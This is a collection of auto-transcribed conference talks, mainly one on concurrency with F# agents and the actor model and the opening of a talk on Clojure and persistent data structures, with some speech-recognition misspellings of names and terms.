customize how Search works for the customer's needs. We need a lot of funding. We see that. And at the same time, a lot of time. In this project, it was quite special because we had a TAP project. We worked on a system which was in beta mode and no documentation whatsoever. And we saw that you really need documentation working with SharePoint. We didn't have that. But we had a good network. As I work in Compario, we have a good relationship with the old Fast, which was brought by Microsoft and who still developed the Search for SharePoint. And we really needed to pick the ones that we knew worked with us and to get information that we needed. We saw that automated deployment was really effectful and it helped us a lot. That made us be able to just deploy the functionality that we have now and continue working on development new stuff. It saved us a lot of time. You can improve performance dramatically by adding more CPU to the Search servers. Adding memory. We saw that by doubling memory. We saw the Search query performance quite dramatically reduced for the Search time. Optimize this queue and have load balancing that work. We had an issue with distributed cache where we had a lot of timeouts. We had to tune the cache to be bigger than the default. That might be because you have a lot of uses on the system. The last one, you have to know your antivirus. Turn it off completely on the servers or at least exclude the index folders. That will hit hard on query performance. That's it. Any questions? We are at the comparison stand. Talk to us. And, bear time. Thanks.
|
Talk 1: Cross-platform mobile gaming with MonoGame - Rune Andreas Grimstad Talk 2: Teach the kids to code - Simen Sommerfeldt Talk 3: Learn from the history - Thomas Pedersen Talk 4: Polyglot persistence - Ole-Martin Mørk Talk 5: What we have learned aboutSharePoint 2013 and Enterprise Search - Tallak Hellebust
|
10.5446/51514 (DOI)
|
Well, yeah, welcome. This talk is about building clean and cohesive concurrent system with F sharp agents. My name is Simon and for those of you who can't really see me, this is my face. I am a father of two and I'm from Denmark and my formal education is in distributed real time systems. I don't really use that. I have my day job where I do software and business intelligence consultancy at D60. And if you need to get in contact with me, you can just come up and ask me or then I'm SS Boys on Twitter and LinkedIn and GitHub. So why should you care about these F sharp agents? Well, as you probably know, for the last couple of years, the processor frequency has not really been increasing that much. They seem to have stranded somewhere between two and three gigahertz. So the free lunch that we have been enjoying for the past couple of decades where without doing anything, our application performance would improve just by having our users upgrade the machines. That is not really happening anymore. But what is happening is that the number of cores is increasing. So now people typically have at least a dual core, maybe a quad core. If you're in a server, you might even have 16 cores. So in order to utilize these new CPUs, we have to do parallel execution. And the problem is that the usual shared memory model we have with locks and semaphores. And so it gets kind of hard as soon as you have multiple threads, it almost gets incomprehensible to regular human beings. And you get into nasty situations like this Brazilian live lock where you have threads not able to move because they're all waiting on each other. And you've probably all been there where you have race conditions and suddenly when you debug it, it works. But then when you don't debug it, it doesn't work. And all those things just coupled with the thing that we have to do asynchronous execution now because we are doing a lot of I.O. We all, pretty much all applications, is calling some kind of network service. And the reason why that is a problem is that the amount of clock cycles it takes to do I.O. increases tremendously when you get away from the CPU and the RAMs. And so when you access this kind of work, you're wasting sometimes 240 million cycles on your CPU if you're just blocking the threads and waiting. So all in all, it's pretty clear that in order to utilize the new CPUs, we have to have a better programming model. And there's a couple of options here depending on your situations. What we'll be talking about is Actors. But there's also something called Software Transactional Memory where you remain with the shared memory model. But the memory is encapsulated as a database, pretty much. You have transactions where you, when you perform a memory change, it just works as a transaction and it's an optimistic concurrency which means that you can have multiple parallel transactions running. Then you're assuming that everything would go all right, but if it doesn't, then you'll just retry the transaction and you could retry indefinitely, but often you will just fail the transaction at some point if it keeps failing. The other option is the Actors where you're using message passing. And that's a shared nothing memory model. So it's good for problems where you are able to separate your problem into small bytes. So you have these separate Actors which do their own thing. So the Actor model, what is it? Well, it's actually a mathematical model of concurrent computation which was invented by Professor Carl Hewitt at Stanford University. And you can see him here is looking all cool and with his crazy physics stuff and his black forward and it's actually, the Actor model is actually modeled after how things works in physics. And Carl Hewitt sees Actors as the universal primitive of all computation. So everything is an actor and they embody processing, storage and communication. The processing will be taking the message and then doing stuff with the message. And the storage is the state that you have inside the agent and the communication is the way that you get those messages around. So you send messages to different Actors. So what is an Actor? Well, it's an autonomous and concurrent object and it executes asynchronously. So it has this mailbox where it receives its message through and then the message will get consumed in a loop. And in the loop you will modify some state perhaps, don't have to, but that's often what happens. But the act of actually receiving the message is asynchronously. So you can receive the message and if no message is available, you're not actually utilizing a threat or you're not blocking a threat. So you can have a lot of these Actors on one thread. The actor has the mailbox and that mailbox has an address or the actor has an address and you can send the message to it and if you're familiar with Erlang and Erlang, they're called process IDs and then you have a machine name and a process ID so you're able to send a message to that process on that machine. And that's how it is in the Actor model. We will see that it's a bit different in FJARP. So what can an actor actually do? Well it can receive and process these messages. It can create new Actors which can be useful in certain scenarios. Typically when you have, you run with something called supervisors where you have the supervisor which is in control of different Actors and if one of those Actors fail, it will create a new Actor in order to, well, heal the system I guess. And of course the Actors can send messages to each other and they can designate how they want to handle the next message. So that's what makes them good at modeling finished state machines because you have current state then you receive a message and then you transform into a new state and depending on what message you receive, you can go into different states and we'll see later how that works in FJARP. So these messages, they are pretty essential to the whole thing and there is a couple of things worth noting though is that the order of receivable of the messages is not guaranteed in the Actor model and also each message will be delivered at most once. That means that you can actually lose messages. But the reason for this is that it goes back to the fact that it's a mathematical model and in order to reason about the system and actually being able to describe them mathematically, it gets easier when you have these relaxed properties. So you just have to live with that I guess. Also when one message is being processed at a time, you kind of have implicit synchronization because when you only have one change to the state at once, you obviously have some sort of synchronization. So what about the FJARP agents? Well, they are similar to Actors but they are not exactly the same. They are built on FJARP async so they are also asynchronous and they run on a thread pool in.NET and you can have these thousands of async agents per thread because as I said when they are not doing anything, when they are just waiting to receive a message, they are not taking up any threads, they are just sleeping basically in the background waiting to get the call back. So one different is that messages are received in order in a sender receiver pair. So if you have a sender and a receiver, if the sender sends two messages, the second message is guaranteed to be delivered after the first message. Obviously if you have different actors sending to the same actor, it can be in-between depending on who gets to put a message into the mailbox. So what are some of the differences to Euler and ACCA and ACTA model? Well, it's not distributed so the address is the identifier of the object in your process. Also messages are delivered exactly once, that's just because I mean it's just putting a message into a queue and in memory so there's no network which could duplicate the messages. Also there are no built-in durable mailboxes and it's double mailboxes and actually not something part of the ACTA model but it's something that is in ACCA. Maybe I should mention that ACCA is a library for SCALA which is a programming on the JVM and what durable mailboxes means is that if the actor crashes, it doesn't lose all those messages already in the mailbox. That's what happens in F-sharp and what actually happens as a standard also in both ACCA and ALANG. Also, it doesn't have built-in supervision support so this whole, you have a supervision tree where you have some supervisor in the top and then it has control over different super, it's different child agents. There's no support for that in F-sharp agents. But how does it look? I don't know why I suddenly think I'm fitting. Anyway, this is what's called a discriminated union. Is everyone familiar with F-sharp already? Or sort of. I'm just going to explain it. This is a discriminated union and you can think of it like an enum and rocks I guess. The way it's actually implemented if you wanted to do it in C-sharp, you would do a base class called calc operations and then these are subclasses where the properties or public fields are just these things and then of course it's immutable so they will probably read only public fields. They can have different values and if you wanted to have multiple values inside this message you just append a asterisk and then another type. So the add and the subtract has an integer value and the total has what is called an async reply channel which is of the type integers. So that just means that it can handle a channel through which the agent can communicate back to the caller or to the original sender of the message. This is the mailbox processor and that's actually what the agents are called in the standard library in F-sharp. They just happen to be called agents. Typically you see people type-deffing a new type called agent which is just an alias for the mailbox processor. I'm not sure why that happened but it's just a convention I guess. Through this start message you handle another function and if you're familiar with C-sharp that's just like a lambda where you have one parameter which is the inbox of the so the mailbox of the agent and then you have this recursive loop. It could also just have been a regular loop with mutable variables so your total would have been a mutable variable but I like to stay in the functional world where you won't have any mutation. So what you do is you have this async block which means that everything inside this can do special things because it's async block. So when you do this receive this won't block the thread because it's an asynchronous call but this let bang, let is the way that you declare a variable or an identifier and the let bang means that well it's like await in C-sharp so it will yield and then whenever something happens it will be called back by the run time and message will become that message that it receives sometime in the future. So now we do a pattern match on the message and we get either an add, subtract or a total message that corresponds to what we have up here and if it's an add we take the current total and we increment it and subtract we decrement it and if it's a total then we get this async reply channel and to that we reply with the total and then we just loop around there's nothing to see here that's just loop and total so we just keep the current total and then down here we're just starting the recursive loop and because f-sharp is tail recursive this won't blow the stack because this spider compiler this will pretty much just be converted into a loop, a regular loop and that's well because it's tail recursive it's able to do that. Also down here we actually use the agent so this start method returns an agent and on that agent you can then post a message and you can post well two messages so first we post an add message then we post a subtract message and those have the values 8 and 3 and then down here we post a total message so there you use this post and reply where you handle it a lambda or a function which takes a reply channel and then you give that reply channel to the total so this means that the mailbox processor or agent receives this channel up here and then the whole result of this is that we get the value total back which is 5, 8 minus 3. This will actually block so if the mailbox processor has a lot of messages this will block until we get a reply on this particular message that we send it but there's also an asynchronous version of this where you are able to receive the value or the reply in the future and you won't block the thread. So anyone have any questions for what we saw until now? Yeah the mailbox processor or agent is running in its own thread so this would be whatever the process thread and this would be some thread pool thread so it won't block that thread so that's how it works. Okay I have a couple of demos where we can see some of the stuff that you can do so what we have here is a small auction system where you have two types of messages you have the message that you send to the auction agent and then you have the messages that you send to the bidder. You could have chosen to use the ASync reply channel here and just have it return those bidder messages but I chose to model both of them as agents just to show how you would typically do it when you have multiple agents and if you want to adhere to the actual model more because actually this whole thing of channels is kind of breaking with the actual model. So what we have here is just we create a new agent and to the constructor we also hand in this function which has the inboxes parameter and then we just do some stuff for some performance counting and we do a try receive on the message and this is 500 milliseconds so if it doesn't receive any messages in 500 milliseconds it will return an option of none and the option is a type which can either be nothing or some value so it's sort of like a nullable in the Cshar which is much better because the value is not defined I guess. So when we receive this message we do a pattern match on that and the winner and you'll notice that the loop here has two so this is basically the state of the agent that has a bid price and a winner and perhaps we don't have a winner yet because we haven't received any messages so the winner is also an option and then the bid price is whatever people bid. So we match on the message which is an option of auction message and we match on the winner which is an option of agent of bid on message so that's this one and if we got a message and if we are still have a valid running auction then we go in and take a closer look again so if it's a bid and we have a winner and the ID of the bidder is the same as the one who is currently the winner we just tell him why are you bidding again you're already the current winner. Obviously if it's like eBay you get to increase your bid but I just chose to model it like this and here you get to do a bid but in this case the bid price is too low so that's what you get told by the auction so this is a bidder message and here we get a bid and it's a valid bid because this clause up here ensures that if the bid price was equal or low we would get in here but now we get in here which means that we have a new highest bidder which is that guy and then we can tell him okay you are now the new highest bidder and what we do here is we do the loop again with the new bid so that's the new bid price and then we add an option with a sum value so that's it can either be none or some of the type so some ID and agent so the winner is actually a tuple with the first argument being a string to identify it so you can call the bidder whatever name you want and then the actual agent that you want to send the message to. If we didn't receive a message so or actually even if we did but I don't think we would actually get down here with so yeah if we receive a message after the time has gone so in the 500 millisecond window after the time might have gone so we could get in here and then we are told that the auction ended with winning bid of so we don't really do anything with the message that's why we mag with an underscore and we take the current winner and we say okay you won and we tell the winner yeah you won and down here we have no winner and we don't care about the message and the auction has ended so we say okay the auction ended with no bids placed and this is pretty much a standard auction obviously you could extend it with much more logic but it will do for now and down here we just start the loop with the start price which was a constructor or a function argument and then the auction end time which we just actually just capture because we don't need to change the auction end time so we just capture it down here okay so the oops the bidder is somewhat like the auction but has some different parameters and we just calculate the next bid and then we send that bid along with our identifier and our inbox so that is the agent and then we do a receive on that message and we if we get told that the bid is too low then we will just loop around and do the next bid or if we are the highest bidder we will just leave for some random time just to celebrate that we are currently winning and down here we are creating an auction and here I am using a feature of FCR which lets you type your floats so you won't be able to say US dollars plus Danish Kronos or Norwegian Kronos without having a converter available so that is very nice if you are dealing with ISU units and stuff like that and other than this zero so that is the start price of the auction we also just tell the auction in 15 seconds and we start the auction and then we spawn 100,000 bidders and we get a bid price and we create the bidder and we start the bidder and then we print out all bidders have been started and then this happens see just compiling so you see that we are receiving a different kind of bidders and you actually see some of the since we are creating 100,000 bidders they actually start bidding before all of the bidders have been created obviously you could fix that by not just starting them right away and that is basically it the different threats you will only see a couple of them but that is because we only see when we actually get a new highest bid and a lot of the bids are just being told you are not high enough and we get a message throughput of 60,000 messages a second so that is pretty fast and I think if I wasn't running in a VM it would probably be a lot faster so that is how you do an auction or could do an auction. Maybe I should just show you what happens if we come in this so this is when you receive a bid but it might not necessarily be a winning bid so just any bid that we receive so you can see that yeah it is baming and it has it makes the throughput of messages drastically less because we are using a lot of time and printing out to the console you will see it now suddenly only 640 messages per second so you probably don't want to write to the console that much. Yeah. Yeah it is. That is one of the nice things about pattern matching is in the way that you can see the bid is that is one of the nice things about pattern matching is in Fshab is that it would guarantee that it is exhaustive and depending on how you configure with your studio you can get a compiler or but it is just a warning which will tell you there is some case that you did not handle and it is exhaustive because if we only have one type of message we can receive which was this bid and we are handling the case where we don't care what the first part is and we care what the second part is and we also handling actually this does this makes it exhaustive since we only have one bid but down here you can see if I go in and I comment out this part then it should tell me yeah incomplete pattern matches on this expression for example the value you won can be received so that is a nice hint that you forgot some case. Yeah. Not without doing the stuff yourself so you would have to do I guess sockets or some other way to communicate. Yeah it is true that you could have done that. Let me see but how would you communicate between the functions I mean if you had one function and you had another function which was so if these was just functions I am not sure how I would communicate between them that is what the messages are for I guess but maybe I am mistaken. Alright any more questions for this part of the talk then let's take a look at some other examples. So one of the things that you can do with an agent is and obviously you could do this in different ways but I think it is pretty smooth thing to do is you can create a batch processor agent so say you are receiving yeah. Yeah sorry. So this is actually just creating a class and this is a pretty nice thing because this means that we can use the agent from C sharp without ever knowing and it has full interability and what we down here has is this is an event which will be triggered whenever a batch is created and this attribute means that it will be by the compiler we convert it into a standard C sharp event as we know them and we can also encapsulate our agent and have methods which make sense in the domain of whatever we are doing so it doesn't you can hide the fact that you are actually posting messages to an agent so you just get a synchronous object or synchronous class. What we are doing here is just we creating this agent and then we have this function maybe I should just say what the parameters are so that's the size of the batch that's the time out of the batch so if some time have gone and we have not received the batch size we will just create a batch anyway and this is an optional synchronization context which we pass in in order to be able to trigger the event on some other thread so that's useful if you are doing stuff with UI so with this function we can just trigger the event whenever we have a batch so as you can see there is some sort of pattern here right we pretty much always have this loop thing and we receive the message and then we do stuff with the message and in this case we are checking for batch size and then if it's the batch size we will take the messages and we will reverse them because in order to get them in the right order you have to reverse it and then we will trigger the event so that they will trigger this event down here and here if we receive a message so that's just increasing the current batch without actually getting to the final batch size and this is if we have messages so if we have received something in the time period and then we have a timeout then we will trigger the event. Okay so how would you do something like this from Csabh? Well it's quite easy because since it's just a regular class we can just new it up as we would and we could use it gets to be generic over the time so you could do whatever you wanted here so this is the type of what you are batching on so this could have been whatever maybe it was a class containing some information and then we just new it up and this is just a small extension message which creates a Fsharp option which is a type that you get when you use Fsharp from Csabh and we subscribe to the event and when the event happens we take a look at whatever happens in this batch so we will get an array of charts this is the messages that we received which was put into the batch and then we just add it to some UI element and yeah we just include stuff into the agent when we press all key so when running this if we wait for a while it's 2000 milliseconds so you can see nothing is being produced when no messages is received that was the third clause I think fourth maybe and then if I do this you can see that okay that was what we and then we actually receive some stuff and I'm not sure exactly why this happens as you can see this is not the correct order I think I think it's actually something with the key up and I'm not sure I wasn't able to find out exactly why the order changes so that's kind of weird but you can see that well whatever and if we get to nine characters we'll just continue creating batches so you could imagine that maybe you're receiving a lot of messages and you need to insert stuff into an SQL server and then you want to use bulk insert so you have this batch and you don't want to fall behind so you at least want some once every 30 seconds you want to insert into the SQL server but if you get say 10 messages you want to insert those as a bulk and that's pretty much it and what's worth noting here is this way that you can encapsulate your agents so that you can't really see that it's an agent and you can use it as you want from C sharp. Any questions? Okay now the next one is where we get into the more interesting parallelism this is say an example created by Tom Petrissik who is an F sharp MVP who actually if you want to know more about F sharp he actually offers courses so you can have him teach you how to code F sharp. This blocking queue agent is something he wrote which is basically it's like a blocking queue but it's an agent so that means that it gets to be asynchronous so you can insert the messages into or the items into the queue doing it asynchronously so you're not wasting time. So what we have here is we have a M2 queue and then when you have an M2 queue it only makes sense to receive ad messages so what we do is we scan through the messages and how scan differs from receive is that when receive a message which we didn't really care about it gets dropped with scan we leave it in the queue and then we jump over it and we only match on those that we care about so this means that if a get message has been sent it will still stay in the queue so maybe we already received get messages and then we receive an ad message then the get message will first the ad message will be processed and then the get message will be processed afterwards even though it was actually in front in the queue and then when we receive a message we transform into another state which is a non-M2 queue and here we add and get so I'm not going to go into this but it's just adding stuff to the queue which is up here and here we are actually using the blocking agents to do an image pipeline where we load in an image from the disk and we scale that image then we do a Gaussian noise stuff on it and then we display that image in the UI so we have up here we just load the image then we add that image to the blocking queue agent here in the scale we load images from the queue and this is where we get the utilization of it being async because in case that we didn't have hadn't loaded any images yet this won't just stand there blocking a thread or something it was just wait asynchronously so if we had other parts of our application it could utilize the thread pool better and when it's scaled it it will add those images to the to the scale images agent and then the filter parts which does the Gaussian thing will get it from the scale images filter it and add it to filtered images and then the display one will do the same just get them from filtered and then it will display it in the UI and down here we start each of these so this is actually the agent part these are just regular asynchronous workflows so the agent part is up here and then we start these three things and we run synchronously on the display image and that's just so that this operation don't don't just fall through basically so that we we block this threat that we started the process on and if you compare it to the way that you might do it with tasks you it looks pretty similar but there are some stuff that you have to handle when you're doing it with tasks so let's see if I can find it here this is pipeline so we we start some tasks and this is much code but then we have these functions and inside those we work on a blocking collection and we do some of the same stuff but we also have to do a handling on exceptions which is regarding whether or not we cancel the the the execution that is actually handled for us in with agents it actually automatically handles cancellation tokens at least in this scenario there are some other scenarios where you have to use it and the reason that is is because every time it just loops around it it does it checks these cancellation tokens by itself so if we take a look at how how that works with regards to performance if we try out the message passing so that's the blocking agent you'll see that we'll end up somewhere around 60 milliseconds for each image it's just running in a loop with those three images and we get similar performance with the pipeline stuff see exactly the same actually and then if we do it sequentially we'll see that we actually got something out of doing it message passing and pipeline so you can see now it pretty much doubles the amount of time of each processing each image so what we are supposed to take from this is just that we can get similar similar performance characteristics as using tasks and at least in my opinion for this particular problem I think it it's easier to write it with the agents simply because they do this error checking and cancellation checking for us and I think it doesn't get much easier than this considering what we are doing I mean we are just loading in images and distributing them through different workflows and then we have these methods which are used in both the task and this one which is the messages sorry the methods which actually does the changes to the to the bitmaps and then yeah sorry yeah sure oh yeah I gotta remember that every time I change so okay so yeah and of course I'll put all this stuff up on GitHub so you can grab it from there and well that's about it for this one I anyone have any questions for this particular example okay so I mentioned this thing that modeling state machines is is something that agents or actors are pretty good at and we saw it already in the previous example with the with the mtq and the non-mtq but I thought that it got a bit cluttered so I wanted a simple example which just shows this thing with the transitioning between the states and this is the border gateway protocol it's the network protocol which is used to control the internet it's different routers and internet on the internet they communicate using this protocol this is a simplification of it I don't handle all the error cases but well I had a lot of more time I could probably have implemented it completely but what we see is that we have some idle state which if we go all the way down here we have this is the state that we start in and now I don't think I need to explain this anymore so we start with this idle state and then when we receive the way that it works in the border gateway protocol that each router gets configured with a table of endpoint that it needs to connect to other routers and in this situation we just have two routers and one of them is configured to connect to the other and one of them is configured to not connect to anyone so what this means is that the one configured to connect receives a peer and the one who doesn't receive anything so it will just receive messages and the other one will do a post connect do connect message to its peer so this means that when we launch two of these the first one with the peer will post a message to its peer and this one will receive the message and then it will do a connect and then it will check okay what is a do connect event I got if it message I got if it was I will go into the connect state which is what we have down here and if it wasn't then I'll just go back and do the idle and that's how the protocol describes it that if you receive anything else then do connect a message when it is in the idle state you'll stay in the idle state and then when in the connect peer we'll receive some we'll send an act to our peer now both of them has a peer because the first one got it configured the other one got it through the do connect event and now then we just send an act to that peer to just say okay we are connected as we should and if we receive an act message we go into an open send state and if we don't we go into an active state and that's just pretty much how it continues downwards here so we would transition between different states and in case you're in the open confirm state and you receive something which isn't a keep alive state then you actually can do a you should actually fail completely that's what the protocol describes that as we don't even transition back to another state you just fail and if you're if you're in the established so if you already have a connection you would go back to the idle state if you received a notification message so that's how you model the state machine where you transition between the states via messages so the transitions between the states are the messages and the functions here are the states and not really anything particularly interesting to see but you can see that you have these threads which were either of them will be in and you can actually see here that we are utilizing the asynchronous nature of it so we actually having both of them run on the same thread so you can see both the first one and the other one are running on the same thread and then at some point it it's not the same thing anymore here you can see it's thread six and thread five so just depends on which thread in the thread pool it gets woken up on and as last example I mentioned earlier that they weren't distributed but the thing is that that's the case with this the build-in ones in in F sharp the agents but there's actually a guy who has been creating a library where he's calling the F sharp actors where you actually have remote remoting and you have supervision but it's very early days so if you want to actually do actors distributed you shouldn't be using this I think you you you should probably using Erlang or Acca but it's maybe it's a glimpse into what we can have in the future in F sharp so how it actually works is you just spawn an actor on oh yes sorry yeah so you spawn an actor on some path on a remote machine or local machine and then you similar to how you did it with with the agent you receive in the inbox here is an actor you receive and you receive then you receive that message and you can say that okay this message was received and we got it on on this listener port this is actually a a ref cell is like a mutable variable but it's on the heap with yeah no no no it's just that's actually come to that right now this is the way that you register a transport so what kind of way do we want to do the remote communication and using here we're using what a high performance socket frame library called fracture which acts as the communication link so we register this transport and then we spawn the actor so in each of the processes we will be spawning an actor which will start listening on some port using a regular socket and then down here that's just handling stuff when we when we launch it so we can enter a message and we can send that message to a a remote a remote actor so yeah can you see this I know it's not and I don't even know if I can increase the size let's see if I can get lucky here maybe okay did that help okay so we can spawn one here so that's its own process and then we can set it to listen on port 40 and you can actually see here that we have supervision support so we always have a system supervisor which controls any agent which or actor which is spawned without a specified supervisor and then we spawn the other one and we say okay you can listen on port 41 and then on this one we can send a message to the other one so here we would write actor dot and then we have to actually define this the the the transport and I'm not sure if that's how it's supposed to be for the future because I guess you will always have to somehow define how the transport is going to be for the actor to connect so I guess it it's probably how it's going to remain so you have actor dot fracture and then you can specify it could have been a remote machine but this is just the local machine and we are connecting to port 40 and we are connecting to the actor or agent called R1 on this one so this is this is the one called R1 and this is listening on port 40 this is called R2 and listening on port 41 and then we can send a message and hopefully it works okay sending message to endpoint and over here we receive the message hello so now we have remoting or remote communication yeah the system supervised I guess it could still crash and then I don't think there was anything to save you I'm not exactly sure how it works in airline but I imagine that maybe it's even built into the VM but I guess you could have it running as a system service or something like that unfortunately when I tried it before I actually got it to crash and that showed you that it would get restarted but it does look like we are that fortunate now but in case that this one would crash with an exception then the supervisor will restart it and you can then just send a new message but unable to get it to crash unfortunately okay I think we are pretty much done now if there's any questions feel free to ask alright thanks
|
As programmers we strive to create clean modular code with good separation of concern and little to no boiler-plate. But for the longest time however, multithreaded code has gotten the better of us by introducing challenging concepts such as semaphores, double checked locking, starvation, deadlocks, race-conditions and other unfortunate heisenbugs. With Carl Hewitts message-oriented actor model it all got much easier though. Languages like Erlang, Scala and F# offer a way to model both asynchronous, concurrent and parallel systems in clean cohesive modules which retains the maintainability of single threaded code, relieves the cognitive overload of traditional multithreaded programs while keeping their great performance characteristics. In this talk we will look at how F# agents and the actor model in general can help you create the simple concurrent applications you dreamed of. We will also see how they can help us solve other problems like optimizing for batch processing and even make distributed systems almost as easy as those that run on a single machine.
|
10.5446/51515 (DOI)
|
Good morning everybody. I'll try that one more time. Good morning everybody. They're all out there on the audio. They just haven't had their coffee yet. My name is Stuart Halloway and I'm going to be talking to you today about closure, which is a programming language for problem solvers. And I want to start from first principles and talk about what I want software to be like. And this is something that we're, you know, working towards gradually. I want software systems to be knowledgeable, right? I want them to have valid and correct information about the world and tons of it. I want them to be powerful. And I want to feel powerful as a programmer using it. You get that high when you do something on the computer faster or easier than you thought you could before. It's just an amazing feeling. I want software to be flexible. How many of you have had the experience as a developer of having a business stakeholder come to you and ask for some feature which sounds really incremental? And you had to say to them, eh, I know that sounds really incremental, but actually given the way the system was architected, it's seeing the impossible. Or it's going to cost doubles. Anybody had that experience? That's a terrible feeling. I don't want that feeling. I want the opposite of that feeling where I make the software 10% more capable with 10% additional effort. And that's very tricky to do. I want my software to be smart. I want programs to anticipate my needs, to be out ahead of me, to have capable analysis. I want them to be effective. I want the decisions made by software to actually enact change in the world. Change in my world, change in the business world. I don't just want idle information, I want action. And finally, and this is really something that has become dominant in the past couple of years, I want software to be pervasive. I and all the users that I write for have an expectation that their software is going to be available how many hours a day. 24, right? Everybody expects 24-7 software. And where is the software going to be available? It used to be software ran in big installations. And then we had our own desktop machines. And then we had laptop machines. And now I have an expectation that I can carry a device in my pocket or on my wrist or in a bracelet that's going to be more powerful than the software that put man on the moon. And if that's not true, I'm going to be pretty disappointed. Now, we try to build, this is, and you know, I would say as a guy who's been in the industry for a while, this feels a little bit like scope creep in terms of what our users want. There was a time when we could have made them happy just having anything at all. But they get more and more demanding. Now, we have to build software in a world where we operate under certain physical laws. One of the physical laws that we operate under is that memory is very expensive. In particular, you probably wouldn't want a provision system with more than, I don't know, 100 kilobytes or so. Because it would be extremely costly to do. Secondly, storage is really expensive. And it's really slow and it's not random access. You have to get bits and bytes off of tape and put them back. So that's a big constraint that we operate under. And machines are really special and precious. Machines are not these anonymous things that you can trivially stand up and down. They're these expensive constructs. They're so special and unique that they're dedicated to tasks. We live in a world of dedicated machines. There's a special database machine somewhere. I know it by name. I call it Gandolf. You know, I get to know it. I swap its hardware out over time. And so, what's wrong with this slide? When was this true? 30 years ago. 30 years ago, right? I think, and, but the problem is that we are working with languages and technologies that are incremental improvements on designs from then. And basically what it comes down to is that the dominant paradigm for writing software in the industry right now is really the greatest hits of the 1970s. And this is a big problem and it's what we're trying to solve with closure. One of the problems that the 1970s give us is an approach to data structures that I'm going to call transients. So if you look at the way we store data, we have to store data transiently because memory is expensive and because storage is expensive, right? Remember, we can only have a couple hundred K of memory and, you know, storage is really pricey. And the effect of having storage be transient is that we have mutable data that we bang away at in place. And so, you see the effect of this on our building systems in a bunch of ways. If I have a data structure which is transient, I can't easily or comfortably share it with you, right? Because somebody might be changing it. It might erode out from under them. Likewise, it's difficult for me to distribute something that's transient because if it's transient, something's happening to it. And we all got to go back to the happening place, right, to find out what may have happened to it. Obviously, concurrent access of transient data structures is a catastrophe. Transient data structures have to be consumed eagerly because if you consume them lazily, by the time you get to them, they may have changed. And they're difficult to cache. Has anybody ever worked on problems of cache invalidation? You can't invalidate something that's persistent, but transient things invalidate all the time because they're changing out from under you. And everything is built this way. The collection APIs in Java are based on transient data structures. The collection APIs in.NET are based on transient data structures. Relational databases are based on transient data structures. And no SQL databases are based on transient data structures. So while I'm excited about no SQL as a movement, it hasn't really addressed what I consider to be the biggest problem yet. And all of this transience comes from a set of design principles that made sense when memory was a million times more expensive than it is now. Imagine how much your world would change if something else got a million times easier to do. Imagine if travel got a million times faster. Right, I live in North Carolina in the United States. It would categorically change the way we planned and organized events. If I could move back to the United States a million times quicker than I will, I'd in fact do tomorrow. We've had that million fold change and very few people have gone back and looked at how we write code and said, hmm, maybe we should do something different. Now, this transient data structure problem is the most important single example of a more general problem, which is complexity. And you know complexity by its symptoms. You have a nonlinear difficulty maintaining systems as they grow. Right, and this could be by any definition of growth. This could be by volume of data. This could be by volume of activity. This could be by size of code base. This could be by features. We've all had that experience that the system gets twice as big and how much more costly does it get to maintain? Even worse, we've had that experience of having the inability to make incremental change to a system. How many of you have some piece of your system that you're terrified to touch? Because you have no idea what's going to happen after you touch it. I mean, our programs are starting to be like the weather. Oh, I see the software is raining today. I have no idea how or why that happened, but I guess we'll just have to live with it. And then of course, in the limiting case, you have large efforts that fail entirely. And so you've probably already heard people throw about statistics about 50% of large IT projects fail, blah, blah, blah. Maybe you've had some experience with that. So we want to attack these problems, and closure is an effort to attack these problems. And it does it in several ways. The thing is that closure uses persistent data structures. I can tell you right now that if you learn nothing else from this talk, if you learn nothing else today, the most important thing you could take back to your job if you don't already use persistent data structures is to start using them. This is a language agnostic observation. You don't have to do the F-sharp pass persistent data structures. So there are places that you can go and get this regardless of what platform you're on. This is where the world is going for all the reasons that I said in the table on the previous slide. Closure is powerful and flexible. I feel like I'm able to get more done, and I feel like once I've gotten something done, I can change it and adapt it to my needs. One of the things that falls out of persistent data structures is functional programming. If I'm going to use persistent data structures, everything's immutable. And so I live in that world of FP. And where that tends to run aground is that we do want our programs to have effect in the world. And a purely functional system would just sit there and get warmer. It wouldn't have any input or output. And so there's a bunch of ways people deal with that problem in the functional languages. One way is to model time actually as functionally as well and use monads. And so there are functional languages that go down that road. Another way is to sort of punt a little bit and say, well, you know, use functional when it's suitable and use something else when it isn't. A third way, which is what closure does, is to say that identity in a system, something that's changeable over time, changes via succession of values. So you have an immutable value, and then you have another immutable value, and then you have another immutable value later. Closure is a Lisp. It's actually the least important of the points on here. Obviously, that hits you in the face when you first look at it, but I made the observation on the panel discussion earlier in the week that someone said, do we have too many functional languages? And I said, I don't think we have anywhere near enough. Just to pick one example familiar to heart, you could build a language based on all these principles except for Lisp, and you would have a language that doesn't exist in the current ecosystem. There's not a choice out there that has closure's characteristics minus being a Lisp. Finally, closure is designed by and for professionals for building professional software. It is not designed for hobbyists or entertainment. It is not designed for newbies. It is not designed for academic use. People do all those things, obviously, but when the rubber meets the road and decisions have to get made in the language, the language is squarely aiming at expert professionals getting shit done. So let's look at the language. Closure is built on top of a data format called the Extensible Data Notation, or EDEN. And when you see EDEN in a moment, you're going to think JSON, and it is similar superficially to JSON, and we would have used JSON except we needed the following three characteristics which JSON does not have. We needed a richer set of built-in data types. JSON has string, which ends up having to get multipurpose for a lot of different things. We wanted a generic mechanism for extensibility, so the ability to add new kinds of data structures without requiring existing serializers or consumers to have to know about them in order to do their work, and language neutral. And we didn't want to get into the object game at all. So I sort of think of my experience with data serialization as a sort of Goldilocks and the Three Bears kind of story where, you know, XML is too hot and JSON is too cold and EDEN is kind of just right. And the sense in which it is just right is that it is richer in its data capabilities than something like JSON, but it does not run off the rails in trying to pursue identities or objects or things like that. And for those of you who have done this stuff for a long time, if you remember things like SOAP Section 5, that's the kind of catastrophe that I'm talking about. So let's take a look at EDEN notation. We have strings, they're double-quoted. In Java or C-sharp, there will be strings. We have characters led by a backslash. There will be characters. We have integers, doubles, booleans, true and false. We have nil. The word nil as opposed to null comes from the Lisp world. We have ratio types, and then we have two types that can represent names. We have symbols, which just look like words, and there's a rich set of legal characters, so, you know, plus sign also could be a symbol. And then we have keywords, which just look like words with a colon stuck in front of them. Most of this lines up fairly well with syntax in C-sharp or Java or JavaScript as far as it goes. Then there are four collection literal types. A list is demarcated by parenthesis, and it suggests something that's going to be seen sequentially. So there's a presumption when something is serialized as a list that when you read it back, you're going to get something that is O of n to traverse it. Vectors, on the other hand, are associative collections by index. So the presumption is if you have something that's in the square brackets, that's something that you could efficiently look up the guy at the end in O of one time. Maps are key value pairs. So here we have the keyword A pointing to the value 100, and the keyword B pointing to the value 90. And sets are collections where you have membership. 